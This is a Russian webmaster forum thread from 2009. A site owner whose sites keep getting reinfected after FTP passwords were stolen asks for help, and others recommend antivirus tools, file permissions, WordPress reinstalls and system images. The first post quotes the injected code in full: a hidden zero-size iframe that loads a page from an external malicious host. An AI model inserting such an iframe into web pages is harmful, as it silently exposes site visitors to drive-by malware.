- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ситуация следующая: несколько дней назад вирусом были заражены все мои сайты (на нескольких хостингах). Код вируса записывался к конец файлов (в основном только файлов с названием index.*). Выглядел примерно следующим образом:
<iframe frameborder="0" onload="if (!this.src){ this.src='http://iq-mozgi.ru:8080/index.php'; this.height='0'; this.width='0';}" >vomfhwifyuxyvbppdqqmcsxjdloumov</iframe>
Аваст определяет HTML:Illiframe-D [Trj]. Сначала я почистил все файлы с такой строкой (и пододными строками, их было несколько вариантов) и все вроде как наладилось. На следующий день у меня снова все сайты были заражены. Тут я понял, что зря я хранил пароли введенными в total commander. Чтобы избавиться от вируса, я сначала поменял все пароли, удалил фтп соединения из тотала, снова почистил хост. Все опять наладилось, но уже на следующий день снова все сайты заражены. В чем же дело - я же уже не сохранял пароли? А может вирус прописался в пределах сайта, чтобы самовосстанавливаться?
ЧТо касается безопасности, то перед первым заражением у меня стояла бесплатная версия Avira (которая регулярно обновляется), затем в дополнение к Avira я поставил Avast, проверил им комп, он вроде как убил вирусы, но как видимо - не все. Система WinXP SP3 (обновления отключены)
Еще один момент - когда запускаю вебмани (и еще в некоторых случаях) сейчас (после установки аваста), Avira ругается на обнаружение вируса TR/Crypt.XPACK.Gen, но показывает, что он находится в файле C:\WINDOWS\Temp\_avast4_\unp174722536.tmp.
Итак, на данный момент я принял решение, что нужно переставить винду (перед этим отформатировав все диски), затем поставить нормальный антивирус и файервол и в дальнейшем не сохранять фтп пароли введенными. Что касается сайтов - то посносить их и восстановить записи из БД (у меня все в основном на вордпрессе).
От вас жду:
1. Советов по поводу правильности моего решения (и эффективности на будущее)
2. Советов, какие антивирь и файервол лучше установить, и вообще как граммотно восстановить безопасность в данном случае?
p.s. и еще меня очень настораживает момент, что после смены паролей (при том что они не сохранялись в фтп клиенте) - вирус их все-таки украл (конечно, если на сайтах просто не остался самовосстанавливающийся вирусный код)
У меня на вордпрессовском сайте аналогичная штука где-то еще пряталась, кроме index.
Долго я с ней боролся, и в итоге победил - стирал, она появлялась, опять стирал... Я оказался терпеливее;-) Обошлось без переустановки Виндовс.
100% гарантии никто не даст. Мне Avira вполне нравится, но когда борьба идет, то в дополнение используется AnVir Task Manager и Malwarebytes’ Anti-Malware. В особо тяжких случаях - еще и антивирусные форумы.
На сайтах, кстати, постарался по возможности выставить у критичных файлов свойства 444 (только чтение).
ТС - у меня такое часто бывает.
Стоит - только Авира.
После того, как Авира ловит вирь и не может его убить (такое не часто происходит, правда), восстанавливаю систему из образа (5 минут - и у тебя чистая система со всем установленным твоим ПО). После чего уже меняю пароли.
У меня на вордпрессовском сайте аналогичная штука где-то еще пряталась, кроме index.
Долго я с ней боролся, и в итоге победил - стирал, она появлялась, опять стирал... Я оказался терпеливее;-) Обошлось без переустановки Виндовс.
100% гарантии никто не даст. Мне Avira вполне нравится, но когда борьба идет, то в дополнение используется AnVir Task Manager и Malwarebytes’ Anti-Malware. В особо тяжких случаях - еще и антивирусные форумы.
На сайтах, кстати, постарался по возможности выставить у критичных файлов свойства 444 (только чтение).
у меня еще также заразился форум phpbb и сайты на joomla.
Что касается полечить сам сайт, то это несложно. Я думаю БД вирусняк то не затронул, просто сделать бэкап (с помощью того же WP-backup), а файлы все посносить и залить новый ВП (ну а в него уже разбэкапить базу). Просто я никак не могу понять, как у меня украли пароли, когда я их поменял и уже не оставлял сохраненными в настроенных соединениях
plamar добавил 04.11.2009 в 19:40
ТС - у меня такое часто бывает.
Стоит - только Авира.
После того, как Авира ловит вирь и не может его убить (такое не часто происходит, правда), восстанавливаю систему из образа (5 минут - и у тебя чистая система со всем установленным твоим ПО). После чего уже меняю пароли.
а как создать такой образ?
plamar, Acronis True Image Form.
plamar,
Acronis True Image - проще всего и надёжнее.
Сначала ставишь чистую систему (обязательно), устанавливаешь все обновления, весь необходимый софт и делаешь образ. Обязательно образ храни на другом логическом диске (или даже на другом физическом)
И потом, когда возникнут проблемы, просто восстановишь систему из файла-образа.